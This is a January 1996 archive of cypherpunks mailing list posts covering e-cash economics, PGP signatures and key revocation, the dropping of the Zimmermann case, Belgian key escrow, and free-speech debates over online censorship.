17.Stadler, Markus; Piveteau, Jean-Marc; Camenisch, Jan, Fair Blind Signatures ,
     Proceedings of EUROCRYPT 95,Lecture Notes in Computer Science, vol. 921, pp. 209-219,
     Berlin, May 1995. 

18.Kocher, Paul C., Cryptanalysis of Diffie-Hellman, RSA, DSS, and Other Systems Using
     Timing Attacks, Stanford, California, December 1995. 

19.Schoenmakers, Berry, An Efficient Electronic Payment System Withstanding Parallel
     Attacks, CS-R9522, Amsterdam, Netherlands, March, 1995.


===========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 10 Jan 1996 23:53:08 +0800
To: cypherpunks@toad.com
Subject: When they came for the Jews...
Message-ID: <2.2.32.19960110153325.006b5980@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


*********
Citing ``the rapidly expanding presence of organized hate groups on the
Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
Center] on Tuesday began sending letters to hundreds of Internet access
providers and universities asking them to refuse to carry messages that
``promote racism, anti-Semitism, mayhem and violence.'' 

But Cooper said the ``unprecedented potential and scope of the Internet''
gives people ``incredible power to promote violence, threaten women,
denigrate minorities, promote homophobia and conspire against democracy.'' 

He cited the posting of instructions for making explosive devices, including
recipes for Sarin nerve gas and bombs similar to the one that destroyed the
Federal Building in Oklahoma City last April 19.
***********

In reading the above from today's NYT, I was interested to see the expansion
of the protected classes who are not to have unkind things said about them
on the Nets.   Aside from the usual list of suspects, I noted that
*democrats* were also to be protected.  I thought that "conspiring against
democracy" (something I do daily) was classic political speech and and
activity that even the drafters of the American Constitution practiced from
time to time.  I guess I'm going to have to watch my attacks on democracy if
I don't want to get my Net access cut off.

DCF

"I favor discrimination on the basis of race, creed, color sex, age,
alienage, previous condition of servitude, recent interstate travel,
handicap, sexual or affectional preference, marital status, Vietnam-era
veteran status (or lack thereof), occupation, economic status, and anything
else I can think of."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 10 Jan 1996 23:55:34 +0800
To: cypherpunks@toad.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <v02120d00ad198d1cf1b0@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 1/9/96, Alexander 'Sasha' Chislenko wrote:

>- Landfills:  They are probably the richest source of detailed historical
>information
>   that is not obtainable from any other source and can be used to reconstruct
>   the detailed history of society, economy, technology and any single
>person with
>   incredible detail.

        I ain't holding my breath until someone develops a search engine
for Fresh Kills.


Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joanna Orzechowska" <JOANNA@Vela.filg.uj.edu.pl>
Date: Wed, 10 Jan 1996 20:39:22 +0800
To: cypherpunks@toad.com
Subject: Groups of prime order
Message-ID: <8F61E63A05@Vela.filg.uj.edu.pl>
MIME-Version: 1.0
Content-Type: text/plain


Hi CP's!

Hope someone would be so kind to help me wiht this:

Is it weaker to use arithmetic mod (p-1), and hence all Zp, when 
suggested to work in a group of prime order q?

This question is connected with discrete log signature protocols such 
as that in Pedersen's "Improved privacy in Wallets with Observers" or 
Schnorr's.

I would appreciate any help ASAP, since I'm in a hurry.
Please, answer me by personal mail since I'm not subscribed to the 
CPs list now.

Thanks and best wishes from Poland.

            Joanna




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: luxana <pati@ipied.tu.ac.th>
Date: Wed, 10 Jan 1996 21:28:54 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: E-cash and Interest
In-Reply-To: <Pine.OSF.3.91.960110002053.21014A-100000@nic.wat.hookup.net>
Message-ID: <Pine.SUN.3.91.960110180328.2965A-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jan 1996, Tim Philp wrote:

> With the E-cash systems that I have seen, you generate your own E-cash 
> and have it signed by a 'bank' At that moment, it becomes like cash in 
> your wallet and you loose interest that this money could be earning.

>From the standpoint of monetary economics, this is correct.  The (ecash)
bank has the right to use your deposits to give out loans.  When you
withdraw your money (and turn it into either cash or ecash) they (the
bank) no longer have the right to turn your deposits into loans. 
Withdrawn cash/ecash can not earn interest.

This is the problem of (e)cash: if you have it on hand you _must_ forgo
any interest earnings.  Theoretically, the optimum holding of (e)cash is a
function of interest rate (the greater the interest rate, the less cash on
hand), transaction cost of making withdrawals (the easier and more
convenient the withdrawals, the less cash on hand), and the "providence
value" of cash (the more you value instant gratification, the more cash on
hand). 

Thats why ATM machines have caused us to hold less cash.  We can now keep
money in the bank (letting it earn interest and letting the bank create
loans with it) and withdraw from ATM terminals only when we need it.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: luxana <pati@ipied.tu.ac.th>
Date: Wed, 10 Jan 1996 21:11:55 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Starting an e-cash bank
In-Reply-To: <199601031925.NAA02085@proust.suba.com>
Message-ID: <Pine.SUN.3.91.960110182856.4192C-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


sorry if this is a little late.....

On Wed, 3 Jan 1996, Alex Strasheim wrote:

> > What does it take to be called a bank?
> 
> Is it necessary to be called a bank?  I've got a storefront in Chicago.  
> What would prevent me from opening up a Mark Twain account and buying and 
> selling ecash on floppies, in person?  Do account holders have to agree 
> not to do that before Mark Twain gives them an account?  Is it illegal?
> 
> The currency exchange model almost seems more appropriate for most users
> than the bank model.

Not exactly currency exchange.  More like simple exchange.  Don't confuse
"issuing ecash" with "exchanging ecash for cash".  Issuing implies that
you have assets to back up the ecash.  Exchange only means that your
giving up your ecash for an equivalent amount of cash. 

Anybody could conceivably "exchange ecash".  Only "banks", who back up 
your money by law and researves can "issue ecash".

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: luxana <pati@ipied.tu.ac.th>
Date: Wed, 10 Jan 1996 20:58:00 +0800
To: iang@cs.berkeley.edu
Subject: Re: Starting an e-cash bank
In-Reply-To: <4cjg0c$rm5@calum.csclub.uwaterloo.ca>
Message-ID: <Pine.SUN.3.91.960110183907.4192E-100000@ipied>
MIME-Version: 1.0
Content-Type: text/plain


On 5 Jan 1996, Ian Goldberg wrote:

> Huh?  Why?  If I'm an ecash seller, I take a customer's paper money,
> withdraw ecash from _my_ MT account, give the ecash to the customer
> (_not_ a payment: I just give him the coin -- the pair (n,f(n)^(1/h)))
> and the customer is free to use it at will.  It's Digicash's slogan:
> the numbers _are_ the money.

But you're not issuing ecash, you're just exchanging it.  Do the
blackmarket money changers of many countries issue cash?  No, the
governments do that.  The governments may outlaw the practice, but its
still done coz of the government's inneffiencies. 

But MT is the issuer, they actually create the money from your original
deposits.  They can't issue ecash without user deposits. 

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Fri, 12 Jan 1996 05:54:09 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Zimmermann case is dropped.
Message-ID: <199601081035.KAA02532@maalox>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

My lead defense lawyer, Phil Dubois, received a fax this morning from
the Assistant US Attorney in Northern District of California, William
Keane.  The letter informed us that I "will not be prosecuted in connection
with the posting to USENET in June 1991 of the encryption program
Pretty Good Privacy.  The investigation is closed."

This brings to a close a criminal investigation that has spanned the
last three years.  I'd like to thank all the people who helped us in
this case, especially all the donors to my legal defense fund.  Apparently,
the money was well-spent.  And I'd like to thank my very capable defense
team:  Phil Dubois, Ken Bass, Eben Moglen, Curt Karnow, Tom Nolan, and Bob
Corn-Revere.  Most of the time they spent on the case was pro-bono.  I'd
also like to thank Joe Burton, counsel for the co-defendant.

There are many others I can thank, but I don't have the presence of mind
to list them all here at this moment.  The medium of email cannot express
how I feel about this turn of events.


  -Philip Zimmermann
   11 Jan 96

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPDy4WV5hLjHqWbdAQEqYwQAm+o313Cm2ebAsMiPIwmd1WwnkPXEaYe9
pGR5ja8BKSZQi4TAEQOQwQJaghI8QqZFdcctVYLm569I1/8ah0qyJ+4fOfUiAMda
Sa2nvJR7pnr6EXrUFe1QoSauCASP/QRYcKgB5vaaOOuxyXnQfdK39AqaKy8lPYbw
MfUiYaMREu4=
=9CJW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david@sternlight.com (David Sternlight)
Date: Thu, 11 Jan 1996 05:26:59 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <david-0901961101110001@lax-ca23-19.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601030407.UAA12551@comsec.com>, dlv@bwalk.dm.com (Dr.
Dimitri Vulis) wrote:

>I've been engaged in a lively debate with a few members of the cypherpunks
>mailing list about forgeries that are hard to repudiate even if PGP signatures
>are used. One of the participants suggested that I post a summary to
>alt.privacy.pgp and sci.crypt, which is just what I'm doing.

<long comment that signed messages don't include the headers, omitted>

Although I do not disagree with the poster, and it may be useful to
include headers in the encryption (though care must be taken in verifying
them if the routing process adds anything), the lesson here is really a
different and important one than the writer's idea of encrypting headers.

It is that signed messages en clair are a)unencrypted to a specific
recipient, b) anyone may "validate" such a message, and c) "BEGIN PGP
SIGNED MESSAGE" and
"END PGP SIGNATURE" mean exactly what they say--only the delimited matter
is authenticated. Thus if one is writing to Carol to break off a
relationship, one had better include "Dear Carol" in the message text, and
if you are in relationship with more than one Carol, or expect to be, the
date and other particularizing info as well.

By the way, if Bob is sending unencrypted e-mail to Carol about the
details of their relationship for reasons other than public witness, he
has more than spoofed headers to worry about. It's his own head, er, that
needs scrutiny. :-)

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 11 Jan 1996 06:05:33 +0800
To: Leo Van Hove <lvhove@vnet3.vub.ac.be>
Subject: Re: Belgium has 'key escrow' law
In-Reply-To: <v01530500ad17e84af074@[134.184.16.171]>
Message-ID: <Pine.BSD.3.91.960109193635.7811G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Leo, 
 
 
  I read with wry amusement that "...enactment of these [register 
  keys or else!] articles went almost completely unnoticed...." 
 
  Here's ANOTHER "almost completely unnoticed" item: 
 
  On 10 02 95 The Electronic Telegraph (www.telegraph.co.uk), in 
  a newsstory headlined "Plan to police e-mail seems [!] certain 
  to fail," reports that

   In France, it is illegal to use any kind of encryption, and 
   police can arrest the authors of any e-mail which they cannot 
   understand.
 
 
  My question:

     In Europe, is anyone working on translating plaintext 1 into 
     plaintext 2, so that the latter serves to encrypt the former? 
 
 
  Plaintext 2 will have to be good enough to satisfy the gendarm- 
  erie, which NEVER fails to notice enactment of electronic-baton 
  laws. 
 
 
  Cordially, 
  
  Jim 
 
 
 
  INCLOSURE: 
 
 
  Date: Tue, 9 Jan 1996 14:16:06 +0100
  From: Leo Van Hove <lvhove@vnet3.vub.ac.be>
  To: cypherpunks@toad.com
  Subject: Belgium has 'key escrow' law


  Surprise, surprise.  Today's issue of 'De Standaard', Flanders' most
  respected newspaper, reports that - much to everybody's amazement - Belgium
  has a key escrow law in working order - or almost...

  The newspaper states that certain articles of a much 'broader' law that was
  passed on the 21th of December 1994, if enforced - which to date has _not_
  been the case, would imply that encryption of computer messages is illegal
  unless the private key is registered with the BIPT (the Belgian Institute
  for Postal services and Telecommunication; a government administration that
  regulates the telecom sector).

  At the time of enactment these articles went almost completely unnoticed -
  hence the amazement.  As mentioned, said articles are not enforced yet but
  it now appears that a working group, called Belinfosec (Belgium Information
  & Security), led by a colonel of the military intelligence services - no
  less, is preparing a report which would contain further specifications and
  would propose enacting clauses.
v
  Note that at present there is already legislation up and working that
  enables Belgian law enforcement to tap telephone lines 'in specific
  circumstances' (i.e., suspicion of criminal or terroristic activities).
  Judging by the newspaper article it will not be long before this will
  include computer messages.

  Asked for a reaction, officials from the banking sector reacted with both
  disbelief and outrage.  The article quotes the head of security at Banksys
  (the interbank consortium that operates Belgium's nation-wide
  ATM/POS-network) who considers it to be "unacceptable" and "an intrusion on
  privacy" if government authorities  were to be able to monitor all the
  money flows that pass through the Banksys network.  He also fears that once
  revealed to the authorities, the keys might fall into the wrong hands, thus
  jeopardizing the system's security.

  I'll try to find out more and keep you informed.

  Ciao,

  leo

  P.S. I'm not on the cpx mailing list, so please Cc me.


  _________________________________________________________________________
  Leo Van Hove

  Centre for Financial Economics
  Vrije Universiteit Brussel (Free University of Brussels)
  Pleinlaan 2
  B-1050 Brussels
  Vox: +32 2 629.21.25
  Fax: +32 2 629.22.82
  e-mail: lvhove@vnet3.vub.ac.be

  VUB's Web site: http://www.vub.ac.be
  _________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 11 Jan 1996 02:29:52 +0800
To: cypherpunks@toad.com (punk)
Subject: NOISE Today in history
Message-ID: <199601100428.XAA05110@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


There is 'Punk irony in spades in today's list:

	On Jan. 10, 1776, Thomas Paine published his influential 
pamphlet, ``Common Sense.'' In his call for American independence 
from England, Paine wrote, ``Everything that is right or reasonable 
pleads for separation.''  

>From personol independence to personel monopoly control:
	In 1870, John D. Rockefeller incorporated Standard Oil.  

Promises made, promises broken:
	In 1920, the League of Nations was established as the Treaty of 
	Versailles went into effect.  
and
	In 1928, the Soviet Union ordered the exile of Leon Trotsky.  

If at first you don't succeed...
	In 1946, 50 years ago, the first General Assembly of the United 
	Nations convened in London.  

Can the telescreen be far behind?:
	In 1946, the first man-made contact with the moon was made as 
	radar signals were bounced off the lunar surface.  

Gee, will ITAR be next to go?:
	In 1990, Chinese Premier Li Peng lifted Beijing's
	seven-month-old martial law, and said that by crushing
	pro-democracy protests, the army had saved China from ``the
	abyss of misery.''



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Thu, 11 Jan 1996 05:59:06 +0800
To: mark@unicorn.com
Subject: Re: Can you break my encryption protocol ? - improvements
Message-ID: <9600108212.AA821264060@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


          On 1/9/96 at 1:55pm, Bob Baldwin wrote:

          > Mark,
          >    The protocol works well ...
          [SNIP]
          > Server computes:
          >   X = Dec(K, Vs)
          >   Test that H(X) = Ns, if not ...
          > All subsequent communications should be encrypted with K.
          >   -- Bob Baldwin

          I think that the last part should be:

          Server computes:
            X = Dec(K, Vc)
            Test that H(X) = Nc

          Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 11 Jan 1996 00:44:33 +0800
To: cypherpunks@toad.com
Subject: Re: Revocation, Trust, Policy Models, etc.
Message-ID: <199601101059.CAA27100@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>The question is: is there a "majority vote" mode on the keyservers that
>>causes them to remove a key if enough people claim it is no longer valid?

No - it's too easy to attack.  (It's also outside the scope of what the
keyservers do - they're convenient ways to collect the data for the 
Web of Trust, but they're not trusted themselves.)

Even if you wanted "A majority vote of people who've signed a given key"
to revoke the key, that's easy to attack - you and your tentacles
can all sign the victim's key, send the signatures to the keyservers,
and now that you're the majority, you can all send in notes saying
"please revoke victim@antinuke.org's key - he's an FBI plant".

I'm not really satisfied with Matt's description of revocation
that requires it to be done by a key's signers, not owner,
though there are workarounds for most of the problems,
though I agree that PGP's framework is deficient
(not inadequate - it's still Pretty Good - but way underpowered.)
One problem is that usually _you_ are the one who knows your key
needs revoking (either you forgot the passphrase, or you know
the computer it was on has been compromised, or whatever.)
Under PolicyMaker, I guess the best way to implement this is to
always sign your own key (since signers are the ones who revoke keys),
and establish policies requiring unrevoked self-signatures.
It may be difficult to implement Certificate Revocation Lists
in a way that works well for your own keys, though, depending on
why you want to revoke them.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 11 Jan 1996 00:43:39 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: A couple of ideas for PGP-based programs
Message-ID: <199601101100.DAA27140@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:32 AM 1/6/96 -0800, Alan Olsen <alano@teleport.com> wrote:
>1) Something I would like to see on the keyservers for PGP is a way of 
>retreving all of the key revokations since x date without having to get all of
>the keys since that date. 

The web interface to the MIT keyserver lets you search for keys,
and probably some of the other interfaces do too.  So do a retrieve 
on REVOKE, snarf the output, and feed it to perl or grep or something.
PGP keyserver

>2)  I would like to see a program like private Idaho have the ability to send
>mail to the key server and grab all of the "unknown signator" keys.  This would
>have the interesting effect of building a more complete keyring, while using 
>the "web of trust" to weed out alot of the bogus keys that tend to crop up on
>the key servers. 

I found that a very convenient way to add things to my keyring was to
use the keyserver web page and Private Idaho simultaneously.
Grab the keys you want on the keyserver, cut+paste into Private Idaho,
decrypt (PGP won't find a message, but will find keys), and click on
anything you don't recognize.  Parsing email isn't too tough,
but it takes some work, and it's easier for PC tools to interact through
Netscape or finger when they can instead.

> After n number of iterations you would have more of the
>"important keys" 

n=4 is an interesting depth, given PGP's default settings.....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Jan 1996 00:44:50 +0800
To: cypherpunks@toad.com
Subject: Re: <fwd> Spiegel on CIS Censorship
Message-ID: <2.2.32.19960110111839.00925ad8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 PM 1/8/96 -0500, Vin McLellan wrote:

>CIS's utter
>ignorance of free-speech principles set the stage for the symbolic
>Bravarian Censorship of the Net.  You'll hear of a dozen other nations
>jumping in, with different standards, within the month.

Don't overdo the CIS newsgroup "ban".  The first sysop to "ban" newsgroups
did so many years ago.  There are well-developed techniques to read "banned"
newsgroups.  A FAQ and everything.  
http://www.ECNet.Net/users/mumbv/pages/banned-groups-faq.shtml

Compuserve is just a large proprietary service and sometime ISP (and one of
the most expensive ones).  They are not a big player on the Net.

>        I find the tragic association of a "free" Internet and porn to be
>painfully common among cyberless adults even in my own community.  Odds
>are, my state, Massachusetts -- arguably the most liberal of the US states
>-- would vote for Censorship Filter tomorrow if it were on a ballot.

Luckily it's not and can't be.

>        It's amazing how incompetent the liberal/libertarian side has been
>in this public debate. (So incompetent, in fact, that there has been _no_
>public debate!)  Everyone who wants to place control over any filter (any
>part of The Filter?) in the hands of the citizen is just another
>snuff/torture/kiddy porn addict.

Almost all of the articles on the CIS "ban" have mentioned that
"therapeutic" groups were also included.  Certainly the Net has let CIS know
what we think of them.  They expressed surprise at our reaction.

Their "ban" isn't even a ban as my piece on using CIS to read banned groups
shows.  (http://www.cs.umass.edu/~lmccarth/cypherpunks/banned.html)  It is
making it into Wired and the Baltimore Sun (maybe) and was good enough that
Michael Miller, author of "Using Compuserve" linked to it from his book
page:  http://www.mcp.com/people/miller/cistop.htm.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Thu, 11 Jan 1996 01:10:33 +0800
To: "Douglas F. Elznic" <delznic@storm.net>
Subject: Counterpane Source Code Discs
In-Reply-To: <2.2.16.19960110022146.3717051a@terminus.storm.net>
Message-ID: <Pine.BSD.3.91.960110053759.12119B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Doug, 
 
 
  I bought the disks offered in the first edition. 
 
  I expect to buy those offered in the second. 
 
  The contents of the disks may be available in some rogue archive. 
 
  In headbuilding as in bodybuilding, you have to pay your dues. 
 
  From Counterpane Systems, you can order: 
 
      Applied Cryptography Source Code Disks 
 
         A THREE-disk set of over 100 encryption programs for 
         algorithms such as DES, RSA, IDEA, Blowfish, and many 
         more.  Most of these programs are in the public domain, 
         and can be integrated into working software products. 
 
         These disks are updated twice a year, and subscriptions 
         are available. 
 
         Disks: $40; 2-year Subscription: $120 
 
 
  You can also order: 
 
     A Bimonthly Newsletter 
 
         APPLIED CRYPTOGRAPHY UPDATE 
 
         Now you can subscribe to a newsletter covering the latest 
         advances in cryptographic protocols, algorithms, and tech- 
         niques. 
 
         Among regular features, an "Algorithms Watch" summarizes 
         recent cryptanalytic results against block and stream 
         ciphers.  "Recent Patents" examines U.S. patents awarded 
         in cryptography and related areas.  "Product Data" dis- 
         cusses protocols and algorithms in hardware and software 
         products. 
 
         A must for anyone who needs timely information on cryp- 
         tography. 
 
         Published 6 times a year. 
 
         Annual subscription: $400 
 
   
  Source code disks will only be sent to U.S. and Canadian citi- 
  zens residing in the U.S. or Canada. 
 
  Address: 
 
         Counterpane Systems 
         7115 W North Av    Suite 16 
         Oak Park  IL    60302 
         USA 
 
 
  Cordially, 
 
  Jim 
 
 
  
  INCLOSURE: 
 
 
  Date: Tue, 09 Jan 1996 21:21:46 -0500
  From: "Douglas F. Elznic" <delznic@storm.net>
  To: cypherpunks@toad.com

  Has anyone bought the disks mentioned in applied cryptography? Are they
  anvailable anywhere online to citizens of the US?

  --
  ==================Douglas Elznic===================
                   delznic@storm.net
             http://www.vcomm.net/~delznic/
              (315)682-5489 (315)682-1647
                 4877 Firethorn Circle
                   Manlius, NY 13104
      "Challenge the system, question the rules."
  ===================================================
  PGP key available:
  http://www.vcomm.net/~delznic/pgpkey.asc
  PGP Fingerprint:
   68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
  ===================================================

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Thu, 11 Jan 1996 00:16:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Don't type: "g**d t*m*s v*r*s"
In-Reply-To: <ad180444000210042513@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960110070520.2061A-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 9 Jan 1996, Timothy C. May wrote:

> I have edited the name of this virus so as to minimized its damage. I read
> that even _typing_ the phrase "g**d t*m*s v*r*s" in its full form can cause
> the information stored in the phrease "g**d t*m*s v*r*s" to unpack itself,
> install itself on all types of disk drives, and then initialize the disks.
> 
> I hope we caught it in time!

Of what was I thinking!?!  I owe all a big apology; I hope my habit of 
living my life on the edge of a knife didn't jepordize everyone.  Man, do 
I feel like a slob.  Thank you Tim!  ;)

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 11 Jan 1996 00:54:29 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: When they came for the Jews...
In-Reply-To: <2.2.32.19960110153325.006b5980@panix.com>
Message-ID: <199601101633.IAA18047@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Is there some way I can get a copy of this letter? Is it
directed at specific ISPs or ISPs in general? An open response,
publicized, to this sounds like something I could do. Publicity is
fun.

> 
> *********
> Citing ``the rapidly expanding presence of organized hate groups on the
> Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
> Center] on Tuesday began sending letters to hundreds of Internet access
> providers and universities asking them to refuse to carry messages that
> ``promote racism, anti-Semitism, mayhem and violence.'' 
> 
> But Cooper said the ``unprecedented potential and scope of the Internet''
> gives people ``incredible power to promote violence, threaten women,
> denigrate minorities, promote homophobia and conspire against democracy.'' 
> 
> He cited the posting of instructions for making explosive devices, including
> recipes for Sarin nerve gas and bombs similar to the one that destroyed the
> Federal Building in Oklahoma City last April 19.
> ***********
> 
> In reading the above from today's NYT, I was interested to see the expansion
> of the protected classes who are not to have unkind things said about them
> on the Nets.   Aside from the usual list of suspects, I noted that
> *democrats* were also to be protected.  I thought that "conspiring against
> democracy" (something I do daily) was classic political speech and and
> activity that even the drafters of the American Constitution practiced from
> time to time.  I guess I'm going to have to watch my attacks on democracy if
> I don't want to get my Net access cut off.
> 
> DCF
> 
> "I favor discrimination on the basis of race, creed, color sex, age,
> alienage, previous condition of servitude, recent interstate travel,
> handicap, sexual or affectional preference, marital status, Vietnam-era
> veteran status (or lack thereof), occupation, economic status, and anything
> else I can think of."
> 
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 11 Jan 1996 00:35:08 +0800
To: cypherpunks@toad.com
Subject: Bignum support added to XLISP 2.1h
Message-ID: <v02130502ad193fbd1b75@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Many cypherpunks might enjoy programming in XLISP 2.1h because the freely
available implementation of LISP now offers support for BIGNUMS. That means
it is quite easy to write cryptographic algorithms that use very large
numbers without adding extra support. The downside is that the language is
interpretted and thus much slower than something like C.

It should also be possible to write RSA in a very short XLISP program. I
don't know if you can do 4 lines, but it should be quite short.

-Peter







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 11 Jan 1996 01:56:40 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: When they came for the Jews...
In-Reply-To: <2.2.32.19960110153325.006b5980@panix.com>
Message-ID: <199601101729.LAA01429@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Citing ``the rapidly expanding presence of organized hate groups on the
> Internet,'' a leading Jewish human rights group [the Simon Wiesenthal
> Center] on Tuesday began sending letters to hundreds of Internet access
> providers and universities asking them to refuse to carry messages that
> ``promote racism, anti-Semitism, mayhem and violence.'' 

This is really unfortunate.

Many well intentioned people often forget that groups like the Nazis did
more than simply bombard the public with hate speech -- they suppressed 
opposing points of view.  The problem isn't that the haters were able to 
speak their minds, the problem was that the reasonable people were unable 
to respond.

Censorship is an essential component of totalitarianism, while free speech
is fundamentally incompatible with it. 

There is a marketplace of ideas, and our goal ought to be to make sure
that marketplace has integrity, that the rules are fair.  Anti-semitic
ideas aren't going to succeed in the marketplace because they're wrong,
which is to say that arguments which try to prove anti-semitic points will
always contain logical and factual errors.

Once you start interferring with the market by restricting what can be
said, you run into at least two important problems.  First of all, you
open yourself up to the possibility that some good ideas will be unable to
emerge from the debate.  The nazis suppressed speech, for example, and 
solid arguments against their positions weren't able to emerge.

The second problem is more subtle, and it happens all the time in this
country:  people lose confidence in the market.  I've spoken with people
who believe, for example, that black people are inherently dumber than
white people.  If you ask these people for proof, they say that it's being
suppressed.  In a sense they're right:  arguments that blacks are dumber
than whites are suppressed, not by law, but informally.  But *proof* isn't
being suppressed, because proof doesn't exist.  The suppression of
arguments gives people an out in their own minds, and it allows them to
cling to some silly notions.  Supression of an argument also ends up
eliminating the rebuttal, and when you're dealing with hate speech the
rebuttal is always more powerful than the argument.

If you can win a fair fight, why do you need to cheat?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Jan 1996 00:45:32 +0800
To: cypherpunks@toad.com
Subject: Re: PRIVACY: Private traces in public places
Message-ID: <199601101635.LAA16811@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by tbyfield@panix.com (t byfield) on Wed, 10 
Jan 10:42 AM


>        I ain't holding my breath until someone 
>develops a search engine  for Fresh Kills.


(See code relevance at end.)


